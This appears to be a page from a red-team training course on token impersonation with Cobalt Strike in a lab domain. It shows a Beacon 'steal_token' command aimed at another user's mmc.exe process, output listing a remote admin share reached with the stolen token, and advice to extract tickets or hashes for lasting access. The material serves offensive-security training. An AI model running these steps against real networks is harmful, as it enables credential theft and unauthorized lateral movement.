search

Token Impersonation

We have already seen an example of using Cobalt Strike's steal_token command in the context of overpass the hash. However, if we elevate or land on a system where a user is running a process, we can impersonate its token without having to jump through additional hoops.

If we list the running processes on Workstation 2 from an elevated prompt, we see that jking is running an instance of mmc.exe.

 PID   PPID  Name                                   Arch  Session     User
 ---   ----  ----                                   ----  -------     ----
 4464  392   mmc.exe                                x64   0           DEV\jking

\

We can simply steal its token and access a target.

beacon> steal_token 4464

beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:02:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/31/2022 17:40:32   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     08/30/2022 11:16:24   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     08/30/2022 20:19:27   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/01/2022 07:26:41   DumpStack.log.tmp
 384mb    fil     09/01/2022 07:26:41   pagefile.sys

\

The obvious downside is that if the user closes the process, our ability to abuse it goes away. By taking the additional steps of extracting tickets or hashes, we provide ourselves a more guaranteed or "future-proof" way of leveraging the credential material.

PreviousOverpass the HashNextMake Token

Last updated